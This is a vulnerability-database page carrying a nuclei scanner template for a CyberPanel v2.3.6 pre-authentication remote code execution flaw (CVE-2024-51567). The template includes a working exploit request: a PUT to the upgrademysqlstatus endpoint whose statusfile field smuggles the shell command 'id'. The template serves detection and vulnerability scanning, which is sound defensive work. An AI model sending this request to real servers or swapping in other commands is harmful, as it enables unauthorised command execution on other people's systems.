Lucene search
K

CyberPanel v2.3.6 Pre-Auth Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

CyberPanel v2.3.6 allows remote command execution via unauthenticated requests exploiting a vulnerability.

Related
Refs
Code
id: CVE-2024-51567

info:
  name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
  reference:
    - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
    - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
    - https://cwe.mitre.org/data/definitions/420.html
    - https://cwe.mitre.org/data/definitions/78.html
    - https://cyberpanel.net/KnowledgeBase/home/change-logs/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-51567
    cwe-id: CWE-306
    epss-score: 0.86725
    epss-percentile: 0.99719
    cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cyberpanel
    product: cyberpanel
    shodan-query: html:"CyberPanel"
  tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /dataBases/upgrademysqlstatus HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrftoken}}
        Content-Type: application/json
        Referer: {{RootURL}}
        Cookie: csrftoken={{csrftoken}}

        {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}

    extractors:
      - type: regex
        part: header
        name: csrftoken
        internal: true
        group: 1
        regex:
          - csrftoken=([A-Za-z0-9]+)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "error_message"
          - "requestStatus"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e387f98263fc1e17652bee3144c7bc61ff116355f5e414ae852ba7fc0a5bfdaa02205ab6702bf44086490561b46fdafb4c35ac700257952363f6d4efc2db87e7abc1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.8 - 10
EPSS0.86725
SSVC
21